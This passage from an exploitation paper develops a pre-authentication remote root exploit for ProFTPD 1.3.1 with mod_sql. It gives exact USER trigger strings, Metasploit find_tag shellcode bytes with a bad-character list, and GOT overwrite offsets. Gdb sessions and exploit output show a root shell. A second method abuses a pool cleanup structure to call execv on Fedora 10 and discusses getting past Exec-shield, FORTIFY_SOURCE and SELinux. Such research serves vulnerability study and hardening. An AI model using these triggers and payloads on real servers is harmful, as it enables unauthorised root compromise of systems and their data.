 96 typedef struct cmd_struc {
 97   pool *pool;
 98   server_rec *server;
 99   config_rec *config;
100   pool *tmp_pool;               /* Temporary pool which only exists
101                                  * while the cmd's handler is running
102                                  */
103   int argc;
104
105   char *arg;                    /* entire argument (excluding 
                                       command) */
106   char **argv;
107   char *group;                  /* Command grouping */
108
109   int  class;                   /* The command class */
110   int  stash_index;             /* hack to speed up symbol hashing in 
                                       modules.c */
111   pr_table_t *notes;            /* Private data for passing/retaining 
                                       between handlers */
112 } cmd_rec;
---

Hmm, so we could overwrite pointers with somewhat controllable contents
(don't forget the SELECT .. FROM .. WHERE type stuff interfering..)

------[ 3.3.9 - Summary ]

Out of the backtraces it has generated, the following look most useful (in 
usefulness looking order :p):

- 11380f2c8ce44d29b93b9bc6308692ae
- f1bfd5428c97b9d68a4beb6fb8286b70
- 914b175392625fe75c2b16dc18bfb250

Considering the code path taken, the first is the most easily exploitable. 
Unfortunately, we haven't got a clean EIP overwrite, and instead require 
returning a suitable pointer that will trash stuff near by it... depending 
on exploitation avenue, this may make things rather complicated. 

--[ 3.4 - Exploitation avenues ]

So far, we've found an approach that allows us to return a pointer to be
used later on where data we control is used in conjunction with other data. 

What can we do with that? There's a couple of possibilities:

- Work out how to indicate authentication has succeeded
  - Should leave us with the ftpd with nobody (revertable to root) 
    privileges, and access to /. That'd be pretty neat ;D
  - If we munge the heap too much, however, it may crash. Depending on 
    what's being overwritten etc, it may be unavoidable.

- Run our own shellcode 
  - We can revert to root with a setresuid() call.
  - More anti-forensically acceptable / less effort / etc :p

------[ 3.4.1 - Shellcode approach ] 

By returning a pointer that leads us to overwrite a function pointer with 
our contents, we can run shellcode. All that's required is a single 
address. Let's say for arguments say, we use 

USER ...SHELLCODE%m%a..<POINTER TO RETURN><OVERWRITE CONTENT>

We would overwrite the function pointer with a pointer to shellcode (our
original pointer - X bytes to hit it). If we need to brute force a target 
pointer to overwrite, we can probably repeat <OVERWRITE CONTENT> several 
times to cover more memory than normal.

Due to space considerations, it would be best to use a find sock / recv() 
tag shellcode as a stager, then sending a another payload later on.

If shellcode size is a problem, it would be possible to spray our shellcode
across the heap in the fake auth attempt, and use an egg hunter code in the
trigger auth attempt. Ideally we would have a register or stack contents to
give us an idea of where to start in case of ASLR. 

There are perhaps some other techniques that may be possible on certain
configurations, such as inputting the shellcode via reverse DNS, or in the 
ident lookup text. While possible, it's not entirely needed at this point 
in time and wasn't explored further.

Talking about shellcode, we should look at what character restrictions 
have. Obviously, \x0d, \x0a, \x00 would be problematic since FTP is a text 
line based protocol. Reading further over the contrib/mod_sql_mysql.c code,
we see that we have several other restrictions, as documented in [8], which
gives us the following bad characters:

\x0d (\r), \x0a (\n), \x00, \x27 ('), \x22 ("), \x08 (\b), \x09 (\t)
\x1b (\Z), \x5c (\\), \x5f (_), \x25 (%)

(That is, assuming we are exploiting ProFTPD getting auth information from 
MySQL. If it's getting information from Postgresql, then the bad character 
restrictions are probably different).

All in all, those restrictions aren't too bad, and some light 
experimentation implies it should be fine to use, as the following pastes 
show:

---
msf payload(shell_find_tag) >  generate -b
"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
/*
 * linux/x86/shell_find_tag - 102 bytes
 * http://www.metasploit.com
 * Encoder: x86/fnstenv_mov
 * AppendExit=false, PrependSetresuid=true, TAG=2pDv,
 * PrependSetuid=false, PrependSetreuid=false
 */
unsigned char buf[] =
"\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12\x87"
"\xe9\xb7\x83\xeb\xfc\xe2\xf4\x23\x4e\xd8\x6c\xe5\x64\x59\x13"
"\xdf\x07\xd8\x6c\x41\x0e\x0f\xdd\x52\x30\xe3\xe4\x44\xd4\x60"
"\x56\x94\x7c\x8f\x48\x13\xed\x8f\xef\xdf\x07\x68\x89\x20\xf7"
"\xad\xc1\x67\x77\xb6\x3e\xe9\xed\xeb\xee\x78\xb8\xb1\x7a\x92"
"\xce\x90\x4f\x78\x8c\xb1\x2e\x40\xef\xc6\x98\x61\xef\x81\x98"
"\x70\xee\x87\x3e\xf1\xd5\xba\x3e\xf3\x4a\x69\xb7";

...

msf payload(find_tag) > use payload/linux/x86/shell/find_tag
msf payload(find_tag) > generate -b
"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
/*
 * linux/x86/shell/find_tag - 74 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * AppendExit=false, PrependSetresuid=true, TAG=qvkV,
 * PrependSetuid=false, PrependSetreuid=false
 */
unsigned char buf[] =
"\x31\xc9\xbf\xd3\xde\x9e\x99\xdb\xc9\xd9\x74\x24\xf4\x5b\xb1"
"\x0c\x83\xc3\x04\x31\x7b\x0f\x03\x7b\x0f\xe2\x26\xef\x57\xa8"
"\x13\xe7\x8b\x7b\x07\xc5\xcc\x4d\x9c\x85\x45\x4b\x48\x6a\xe1"
"\x9e\xdf\x3c\x5e\x16\x3e\x46\x9b\x4e\x3f\x46\x36\xe9\xe7\x84"
"\x46\x74\x29\x66\x31\x1c\x03\xfd\x4d\xbd\x57\x50\x52\xa4";

/*
 * linux/x86/shell/find_tag - 36 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xcd\x80";
---

We can note down that we require 74 bytes or so for the shellcode.

If character encoding is enabled in ProFTPD (via mod_lang), this may incur 
further restrictions in characters we can use, or alternatively require 
decoding our payload, so that when it's encoded, it is correct. If 
possible/suitable, that is :p

If the pointers we are after contain a bad character, we're in a little bit
of trouble :|

------[ 3.4.2 - Data manipulation ]

There are plenty of global variables that can be modified in ProFTPD, that 
can/may be useful for data manipulation. 

grep'ing the src/ directory for "authenticated" shows some interesting 
code:

---
 288 static void shutdown_exit(void *d1, void *d2, void *d3, void *d4) {
 289   if (check_shutmsg(&shut, &deny, &disc, shutmsg, sizeof(shutmsg)) == 
          1) {
 290     char *user;
 291     time_t now;
 292     char *msg;
 293     const char *serveraddress;
 294     config_rec *c = NULL;
 295     unsigned char *authenticated = get_param_ptr(main_server->conf,
 296       "authenticated", FALSE);
 297
...
 388       if (c->requires_auth && cmd_auth_chk && !cmd_auth_chk(cmd))
 389         return -1;
 390
... (cmd_auth_chk being a .bss function pointer)
 393       cmdargstr = make_arg_str(cmd->tmp_pool, cmd->argc, cmd->argv);
 394
 395       if (cmd_type == CMD) {
 396
 397         /* The client has successfully authenticated... */
 398         if (session.user) {
 399           char *args = strchr(cmdargstr, ' ');
 400
 401           pr_scoreboard_entry_update(session.pid,
 402             PR_SCORE_CMD, "%s", cmd->argv[0], NULL, NULL);
 403           pr_scoreboard_entry_update(session.pid,
 404             PR_SCORE_CMD_ARG, "%s", args ?
 405               pr_fs_decode_path(cmd->tmp_pool, (args+1)) : "", NULL, 
                                     NULL);
 406
 407           pr_proctitle_set("%s - %s: %s", session.user, 
               session.proc_prefix,
 408             cmdargstr);
 409
 410         /* ...else the client has not yet authenticated */
 411         } else {
 412           pr_proctitle_set("%s:%d: %s", session.c->remote_addr ?
 413             pr_netaddr_get_ipstr(session.c->remote_addr) : "?",
 414             session.c->remote_port ? session.c->remote_port : 0, 
                 cmdargstr);
 415         }
 416       }
---

in modules/mod_auth.c:

---
  59 /* auth_cmd_chk_cb() is hooked into the main server's auth_hook 
        function,
  60  * so that we can deny all commands until authentication is complete.
  61  */
  62 static int auth_cmd_chk_cb(cmd_rec *cmd) {
  63   unsigned char *authenticated = get_param_ptr(cmd->server->conf,
  64     "authenticated", FALSE);
  65
  66   if (!authenticated || *authenticated == FALSE) {
  67     pr_response_send(R_530, _("Please login with USER and PASS"));
  68     return FALSE;
  69   }
  70
  71   return TRUE;
  72 }
  73
---

The authenticated configuration directive is set:

---
1846     c = add_config_param_set(&cmd->server->conf, "authenticated", 1, 
                                  NULL);
1847     c->argv[0] = pcalloc(c->pool, sizeof(unsigned char));
1848     *((unsigned char *) c->argv[0]) = TRUE;
---

It seems a little complicated to call due to other code around it..  but
it'd probably be possible to with a bit of effort and the stack wasn't
randomized, or maybe some other approaches.  That said, the author isn't
going to spend much time looking at it. One last thought on the matter:

---
 192   /* By default, enable auth checking */
 193   set_auth_check(auth_cmd_chk_cb);
---

If authentication is bypassed, but setresuid() is not callable (via NX, or 
whatever), then there is a slight restriction of the user id it has by 
default:

# cat /proc/19840/status
Name:   proftpd
State:  T (tracing stop)
Tgid:   19840
Pid:    19840
PPid:   19830
TracerPid:      19846
Uid:    0       65534   0       65534
Gid:    65534   65534   65534   65534
FDSize: 32
Groups: 65534
...
CapInh: 0000000000000000
CapPrm: ffffffffffffffff
CapEff: 0000000000000000
CapBnd: ffffffffffffffff

UID/GID list in real, effective, saved, fsuid format. Without reverting
privileges, it limits what we can do. That said, it allows for a lot of
information leaking if the directory permissions aren't too strict / acl's 
aren't too strict.

--[ 4 - Writing an exploit ] 

Before writing an exploit, we should quickly review what we have found out 
before:

- Variable substitution allows us expand past the allocated 4096 bytes
  - %m/%r duplicates our input
  - %a gives us our IP address
  - %f gives us -
  - %T gives us 0.0
  - %Z gives us {UNKNOWN TAG}
  - %l gives us UNKNOWN if ident checking is disabled (default).. we'll use
    it even though it's not ideal (ident could be enabled, and if the box 
    where the exploit is ran from is running ident, it could affect the 
    ProFTPD heap layout more.

%a isn't all that good for a remote exploit, as the byte count can differ 
(attacking from 1.2.3.4 vs 136.246.139.246. We'll try excluding that for 
now, although it's useful for consuming small chunks :|

In order to exploit this vulnerability, we can re-use some of our existing 
code to find the input strings needed against new targets when we can 
replicate a target environment.

------[ 4.1 - Exploitation via arbitrary pointer return ] 

So, let's see, what do we need to do?

- Find a suitable trigger string that allows us, say:
  - 16 byte overwrite (since our offset is 12 for first_avail pointer)
  - 74 bytes of shellcode. Should be plenty of space, and enough to do 
    interesting things with.

- Find a suitable target. For the most part, the GOT seems a good
  target, though this may be reassessed later on.
  - Ideally you'd want to use a libc function that will be used next.
    Due to the style of attack we're using, if it uses another libc 
    function, we may overwrite it with crap (crap being stuff like table
    entries / names / our expanded string) :(

After some experimentation, I came up with the following input strings to 
trigger the vulnerability with a suitable call tree:

- USER %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m%mA%m%f%f%l%m%TA%m%
m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%Z%l%m%fA%l%m%TA%ZA%
f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
- PASS invalid
- USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%
m%T%m%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3Aa4A

And we have a crash writing to 0x41346141 ;)

With that info in hand, we can start writing the exploit.. let's find a 
target to overwrite.. From glancing over the back traces, it looks like 
mysql_real_query() is a suitable target.

080e81a8 R_386_JUMP_SLOT   mysql_real_query

Plugging that in, and we get:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 12830)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x080c0ea1 in cmd_select (cmd=0x98ae7ec) at mod_sql_mysql.c:838

Well, that's good. Not entirely what I was expecting though. Looking at the
backtrace, we see it's calling time(NULL), so let's see:

080e8218 R_386_JUMP_SLOT   time

4187    int sql_log(int level, const char *fmt, ...) {
4188      char buf[PR_TUNABLE_BUFFER_SIZE] = {'\0'};
4189      time_t timestamp = time(NULL);
4190      struct tm *t = NULL;
4191      va_list msg;

So, it looks like time is a better target. Updating our exploit:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 12923)]
0x72657375 in ?? ()
(gdb)

That looks better (>>> "72657375".decode('hex') -> 'resu')

(gdb) x/s 0x080e8218
0x80e8218 <_GLOBAL_OFFSET_TABLE_+548>:   "userid, passwd, uid, gid,
homedir, shell FROM ftpuser WHERE (userid='", 'A' <repeats 74 times>,
"0.0-0.0A{UNKNOWN TAG}", 'A' <repeats 36 times>...

Looking further

(gdb) call strlen(0x080e8218)
$1 = 4155
(gdb) x/s 0x080e8218+4155-128
0x80e91d3 <scoreboard_file+2963>:
"%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m%m%Z%T%
m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3\030\202\016"
(gdb) x/40x 0x080e8218+4155-64
0x80e9213 <[...]_file+3027>: 0x256d2554 0x255a256d 0x256d2554 0x416c255a
0x80e9223 <[...]_file+3043>: 0x6c255425 0x54256c25 0x5a256625 0x66256d25
0x80e9233 <[...]_file+3059>: 0x54256625 0x5a256625 0x6d256c25 0x25415425
0x80e9243 <[...]_file+3075>: 0x3061416d 0x41316141 0x61413261 0x0e821833

Playing around further, we see that strlen() is called before that, so 
further experimentation reveals we want to overwrite:

080e819c R_386_JUMP_SLOT   strlen

(Code for this can be found in [9])

And our offset is 0x080e819c-358..

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 13357)]
0x41306141 in ?? ()

So, we've made it jump to another pattern in msf.. which we can replace 
with a pointer to our shellcode.. which will be:

(gdb) x/s 0x080e819c
0x80e819c <_GLOBAL_OFFSET_TABLE_+424>:
"Aa0Aa1Aa2Aa36\200\016\b{UNKNOWN TAG}", 'A' <repeats 74 times>,
"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
%m%Z%T%m%Z%lA%T%l%l%T%f"...
(gdb) x/s 0x080e819c+29
0x80e81b9 <_GLOBAL_OFFSET_TABLE_+453>:   'A' <repeats 74 times>,
"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1"...

To hit our A's.

We can now use a suitable stager findsock/execve shell... We'll use the one
we found earlier with metasploit. Verifying that we can hit our shellcode, 
we see:

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb7c7a6b0 (LWP 13476)]
0x080e81ba in _GLOBAL_OFFSET_TABLE_ ()

So, now we get to validate the shellcode works as expected (code can be 
found in [10])

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7b666b0 (LWP 13648)]
0xbf86cad0 in ?? ()
(gdb) x/10i $eip
0xbf86cad0:     mov    %edi,%ebx
0xbf86cad2:     push   $0x2
0xbf86cad4:     pop    %ecx
0xbf86cad5:     push   $0x3f
0xbf86cad7:     pop    %eax
0xbf86cad8:     int    $0x80
0xbf86cada:     dec    %ecx
0xbf86cadb:     jns    0xbf86cad5
0xbf86cadd:     push   $0xb
0xbf86cadf:     pop    %eax

Whoops. Not so much. The stager code works by reading from the socket to 
the stack, and jumping to the stack once complete. It seems that the kernel
I'm using doesn't make the stack executable even if you setarch/personality
it. 

We could work around that short coming in metasploit by changing our 
shellcode to read() into a different buffer, or mmap() some suitable 
memory, or one of a hundred things. For now though, I'll cheat and install 
the generic kernel, and try to finish off this paper :)

Installing the ubuntu -generic kernel, we see (in gdb):

---
[New process 4936]
Executing new program: /bin/dash
(no debugging symbols found)
warning: Cannot initialize thread debugging library: generic error
warning: Cannot initialize thread debugging library: generic error
(no debugging symbols found)
[New process 4936]
(no debugging symbols found)
---
# python exploitsc.py 127.0.0.1
Banner is [220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) 
[127.0.0.1]]
331 Password required for %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m
%mA%m%f%f%l%m%TA%m%m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%
Z%l%m%fA%l%m%TA%ZA%f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
530 Login incorrect.
*** With luck, you should have a shell ***

id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
uname -a
Linux ubuntu 2.6.27-14-generic #1 SMP Tue Aug 18 16:25:45 UTC 2009 i686 
GNU/Linux
---

Well, that demonstrates from source code to shellcode execution..
exploitation via the demonstrated avenue isn't ideal, but still pretty
decent.

------[ 4.1 - Cleanup structure crash ]

While experimenting with the auth bypass idea with one of the
3d10e2a054d8124ab4de5b588c592830 crashes, I hit a pool cleanup structure, 
and decided to experiment further (with a overwrite of 44 bytes), and 
exploit it without any shellcode required. 

For this section, we'll target Fedora 10, and the following packages:

fbf3dccc1a396cda2d8725b4503bfc16 proftpd-1.3.1-6.fc10.i386.rpm
938fd1a965d72ef44cd4106c750a0a2d proftpd-mysql-1.3.1-6.fc10.i386.rpm

Firstly, we'll quickly review some of the protection measures 
enabled/available in Fedora 10. 

- Exec-shield
  - Aims to prevent code execution via Code Selector limits, or via PAE.
  - CS limits are not ideal. 

- FORTIFY_SOURCE
  - Instruments code during compiling and aims to prevent overflows via
    common library functions. 

- PIE binaries
  - Some binaries available in Fedora 10 are compiled as a position 
    independant executable (PIE). 
  - Numerous binaries are compiled as ET_EXEC's, however, including
    ProFTPD.

- SELinux
  - SELinux is a kernel feature that allows mandatory access control in the
    kernel. For what we're concerned about, it's aimed at restricting what 
    can happen post exploitation. A frequent criticism of SELinux is that 
    it does not protect the kernel against attack.

So, looking at the crash:

Program received signal SIGSEGV, Segmentation fault.
destroy_pool (p=0x8731eac) at pool.c:415
415         if (p->parent->sub_pools == p)
(gdb) p *p
$1 = {first = 0x61413561, last = 0x37614136, cleanups = 0x41386141,
sub_pools = 0x62413961, sub_next = 0x31624130, sub_prev = 0x0,
  parent = 0x62413362, free_first_avail = 0x8002927 <Address 0x8002927
out of bounds>, tag = 0x0}

Quick glance at the source code (from the proftpd-1.3.2-rc2 release, not
the fedora release):

---
410 void destroy_pool(pool *p) {
411   if (p == NULL)
412     return;
413
414   pr_alarms_block();
415
416   if (p->parent) {
417     if (p->parent->sub_pools == p)
418       p->parent->sub_pools = p->sub_next;
419
420     if (p->sub_prev)
421       p->sub_prev->sub_next = p->sub_next;
422
423     if (p->sub_next)
424       p->sub_next->sub_prev = p->sub_prev;
425   }
426   clear_pool(p);
427   free_blocks(p->first, p->tag);
428
429   pr_alarms_unblock();
430 }
---

So, we can see that we overwrote p->parent, and thus entered the 
conditional on line 416. In order to effectively bypass that section, we
need:

- p->parent to point to accessible memory (doesn't matter where, it's
  unlikely to point to p)

- p->sub_prev got nulled out earlier, so it doesn't matter.

- p->sub_next to point to writable memory.

- p->cleanups to point to some memory to be the cleanup structure.

The cleanup structure looks like:

---
655 typedef struct cleanup {
656   void *data;
657   void (*plain_cleanup_cb)(void *);
658   void (*child_cleanup_cb)(void *);
659   struct cleanup *next;
660 } cleanup_t;
---

---
693 static void run_cleanups(cleanup_t *c) {
694   while (c) {
695     (*c->plain_cleanup_cb)(c->data);
696     c = c->next;
697   }
698 }
---

The benefits of run_cleanups is that we could call a bunch of different
pointers as needed.

So, all we need now is to meet our requirements earlier.. For 
reading/writing memory, the BSS is fine.

For the cleanup structure, we need something that is not randomized, and
that we know the offset for. Luckily for us, ProFTPD formats its response 
into the resp_buf buffer, which is on the BSS.

(gdb) p resp_buf
$5 = "Login incorrect.\000 for
%m%m%TA%ZA%f%l%fA%mAA%f%TA%f%f%l%l%m%lA%f%Z%m%m%TA%Z%ZA%T%Z%ZAAA%m%m%f%m%T%
m%f%fA%T%T%Z%l%T%m%l%f%f%f%Z%Z%l%TA%l%l%f%mAA%Z%TAA%f%m%ZAA%l%Z%Z%m%Z%lA%f%
m"...

And, it doesn't clear memory, leaving old data available for us to use as 
our structure location. Our first fake auth will have a bunch of 
AAAA / BBBB / CCCC we can use for replacing.

With those in mind, we can trigger the vulnerability, and see what's 
available to us:

Program received signal SIGSEGV, Segmentation fault.
0x0805c82d in run_cleanups (c=0x80ed933) at pool.c:730
730         (*c->plain_cleanup_cb)(c->data);
..
(gdb) x/10i $eip
0x805c82d <run_cleanups+16>:    call   *0x4(%ebx)
(gdb) x/4x $ebx
0x80ed933 <resp_buf+179>:       0x42424242      0x43434343
0x44444444      0x45454545

Hm, so we need a location in memory to jump to. We control the first
argument to the function, which is useful. . Looking at the symbol
table, we see some stuff of interest:


080e44f4 R_386_JUMP_SLOT   __printf_chk
080e4574 R_386_JUMP_SLOT   mempcpy
080e4578 R_386_JUMP_SLOT   __memcpy_chk
080e4604 R_386_JUMP_SLOT   dlsym
080e46a4 R_386_JUMP_SLOT   execv
080e469c R_386_JUMP_SLOT   memcpy
080e48d4 R_386_JUMP_SLOT   mmap64
080e4800 R_386_JUMP_SLOT   strcat


dlsym() might be useful if we can get the results and save it somewhere.

memcpy()/strcat()/memcpy()/etc could be useful for constructing a ret to
libc style attack.

printf() could be used to leak memory contents. Can't use it for writing
to memory due to FORTIFY_SOURCE.

mmap64() could be useful to map memory readable, writable and executable 
(assuming SELinux allows it, which is unlikely in recent releases).

execv() could be used to execute an arbitrary process (assuming not
prevented by SELinux). execv() takes two parameters, program to execute, 
and argument list. The argument list must consist of valid pointers to 
readable memory, or the execve() (syscall) will fail.

Since execv() looks like least effort, we'll need to find a way to modify 
the stack so that the next argument is a pointer to something suitable (a 
pointer to NULL would be sufficient)

(gdb) x/4x $esp
0xbf977c60:     0x42424242      0x080ccbe2      0x080e8a40
0x08730578
(gdb) x/s 0x080ccbe2
0x80ccbe2:       "getgroups"

Taking stock of what we have:

eax            0x42424242       1111638594
ecx            0x8734e10        141774352
edx            0x80eb040        135180352
ebx            0x80ed933        135190835
esp            0xbf977c60       0xbf977c60
ebp            0xbf977c78       0xbf977c78
esi            0x8731eac        141762220
edi            0x80f680c        135227404

We control eax, edx (edx is the fake pointer for sub_prev/sub_next
stuff), we control ebx to an extent:

(gdb) x/7x $ebx
0x80ed933 <resp_buf+179>: 0x42424242 0x43434343 0x44444444 0x45454545
0x80ed943 <resp_buf+195>: 0x46464646 0x47474747 0x48484848

We control esi to an extent:
(gdb) x/s $esi
0x8731eac:       "a5Aa6Aa73\331016\ba9Ab@\260\016\b"

So, with that in mind, we are looking for writes to stack at [esp], 
[esp+4], [esp+8] and [esp+0xc], and hopefully then a jump register. 

We can assemble a bunch of instructions, and use msfelfscan to show 
potential hits:

ruby msfelfscan -r
"\x89[\x44\x54]\x24[\x04\x08\x0c][^\xff\xe8]*\xff[\x53\x10\x50\xd0-\xe0]"
/usr/sbin/proftpd
[/usr/sbin/proftpd]
0x0805b10a 8944240c89d02b4308894424088b431089142489442404ff53
0x0805b81d 894424048b450c890424ffd2
0x0805cd62 8944240c8b4310894424088b4208894424048b4204890424ffd7
0x0805e158 8944240889742404c70424df7b0d08ffd7
0x08063ed8 8944240c8b431c894424088b4318894424048b4314890424ff53
0x080706cc 895424048b5508891424ff50
0x08070720 89442404a13cd80e088b5508891424ff50
0x08070754 89442404a144d80e088b5508891424ff50
0x08070787 89442404a140d80e088b5508891424ff50
0x08070a84 89542404ff50
0x08070acb 89442404a13cd80e08ff50
0x08070af3 89442404a144d80e08ff50
0x08070b5a 89442404a140d80e08ff50
0x08070cc2 89542404ff50
0x08070ce3 89442404a13cd80e08ff50
0x08070d0b 89442404a144d80e08ff50
0x08070d4a 89442404a140d80e08ff50
0x08072081 8944240ca184ec0e08890424ffd2
0x08072127 8944240c8b4604c744240462c20c0889442408a184ec0e08890424ffd2
0x080721da 8944240ca184ec0e08890424ffd2
0x0807222b 8944240c8b4604c74424046ac20c0889442408a184ec0e08890424ffd2
0x080722ac 89442408a184ec0e08890424ffd2
0x0807824b 894424088954240c8b460489342489442404ff53
0x080782f2 8954240c894424088b460489342489442404ff53
0x08078388 8944240c8b450c894424088b460489342489442404ff53
0x08078468 8944240c8b450c894424088b460489342489442404ff53
0x08078798 894424088b460489342489442404ff53
0x08078a4b 89442404ff53
0x08079b08 8944240889742404891c24ffd2
0x08079bf2 8944240c8b450c89442408ff53
0x08079c93 89442404ff53
0x08079d1c 89442404ff53
0x0807a16c 8944240c8b450c89442408ff53
0x0807a264 89442408ff53
0x0807a7e7 89442408ffd6
0x0807c7d3 89442404ff53
0x0807c85c 89442404ff53
0x0807cc9c 8944240c8b450c89442408ff53
0x0807e412 89542408894c2404893424ffd3
0x0807f209 89442404ffd7
0x0807f222 89442404ffd7
0x0807f262 89442404ffd7

After spending some time looking at the output, we find one that fits the 
bill, and is absolutely perfect.

(gdb) x/10i 0x08063ed8
0x8063ed8 <run_schedule+56>:    mov    %eax,0xc(%esp)
0x8063edc <run_schedule+60>:    mov    0x1c(%ebx),%eax
0x8063edf <run_schedule+63>:    mov    %eax,0x8(%esp)
0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)

If we execute from 0x8063ee3, it does the job perfectly. It will load 
pointers from $ebx (which we can populate however we want), and stick them 
on the stack, then jump to an address we want. We will need a program to 
execute, and a pointer to NULL. We can craft the fakeauth attempt as:

...memory stuff...AAAABBBBCCCC.../bin/sh or /usr/bin/python (as it's
important to have NULL termination, which will be provided).

Hardware assisted breakpoint 1 at 0x8063ee3: file support.c, line 132.

Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
132           s->f(s->a1,s->a2,s->a3,s->a4);
Missing separate debuginfos, use: debuginfo-install
audit-libs-1.7.13-1.fc10.i386 e2fsprogs-libs-1.41.4-6.fc10.i386
keyutils-libs-1.2-3.fc9.i386 krb5-libs-1.6.3-18.fc10.i386
libattr-2.4.43-2.fc10.i386 libselinux-2.0.78-1.fc10.i386
mysql-libs-5.0.84-1.fc10.i386 zlib-1.2.3-18.fc9.i386
(gdb) x/8i $eip
0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)
(gdb) x/x $ebx+0x18
0x80ed94b <resp_buf+203>:       0x48484848
(gdb) x/x $ebx+0x14
0x80ed947 <resp_buf+199>:       0x47474747
(gdb) x/x $ebx+0xc
0x80ed93f <resp_buf+191>:       0x45454545

We can replace HHHH with resp_buf + 400 to point to NULL, we can put in our
offset for the program to execute in GGGG, and our execv code at EEEE, 
which will be:

080526b8 <execv@plt>:
 80526b8:       ff 25 a4 46 0e 08       jmp    *0x80e46a4
 80526be:       68 00 05 00 00          push   $0x500
 80526c3:       e9 e0 f5 ff ff          jmp    8051ca8 <_init+0x30>

Putting those together, we then see:

Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
132           s->f(s->a1,s->a2,s->a3,s->a4);
(gdb) c
Continuing.
[New process 22952]
Executing new program: /bin/bash
warning: Cannot initialize thread debugging library: generic error

Due to alarm() being called in ProFTPD, you'll have to reset it / catch it 
/ block it (the "trap" command in bash should be able to do this for you), 
otherwise the connection will drop out some time later on.

If PIE was enabled, and the binary ended up past 0x01000000, we could brute
force it and still gain code execution. The only problem now to deal with 
is with SELinux restrictions. Any decent kernel exploit will disable that 
for you ;)

------[ 4.2 - Potential enhancements ]

There are a variety of enhancements that could be done to make the exploit 
better in a variety of ways, such as a known target lists, bruteforce 
ability (both offset and tags, if necessary. Timing attacks may be useful),
porting it to metasploit so you have the advantage of changing shellcodes,
etc.

Also, more work would be required against distributions, because if ProFTPD
is compiled with shared library support, using time() as an offset may 
change ;) Additionally, it may be possible that some distributions require 
different ways due to charcter restrictions.

Further research would be needed in common ProFTPD w/ mod_sql.c 
configuration guides in order to see what table names / fields are used.

Further experimentation with the pool implementation in ProFTPD might be in
order, as perhaps it would be possible to work out a generic fake/trigger
string that would work in all cases. 

Since the SQL injection fix, the bug is no longer remote root pre auth via 
USER handling it has lost a lot of it's sexiness <;-P~ Don't know if the 
bug is reachable through authentication.. if it is, there's a lot more work
involved due to dropped privileges, potential chroot()ing, and so on. At 
least RootRevoke isn't enabled by default according to some random 
documentation I was reading :p

------[ 4.3 - Last thoughts ]

Initial experimentation of the vulnerability with constraint solvers was
interesting, however, in hindsight, just replicating the constraint checks
and random generation would of been a better idea. Same goes for using GA
to mutate input strings, though the GA use was worse because the metrics
used was pretty bad. In hindsight, I had a solution looking for a problem.

Additionally, [11] has some more information regarding this vulnerability
when you consider the timing aspect of heap massages.

--[ 5 - Discussion of hardening techniques against exploitation ]

It's always fun to consider the effects of various hardening techniques
against exploitation, and if it helps mitigate the issue. Here's some 
thoughts on the matter.

------[ 5.1 - Address Space Layout Randomisation ]

If the binary is not compiled as a position independent executable (PIE)
binary, ASLR is not much of a problem as we target the GOT for storing the
shellcode. We require only one offset, and on non-PIE binaries, we should 
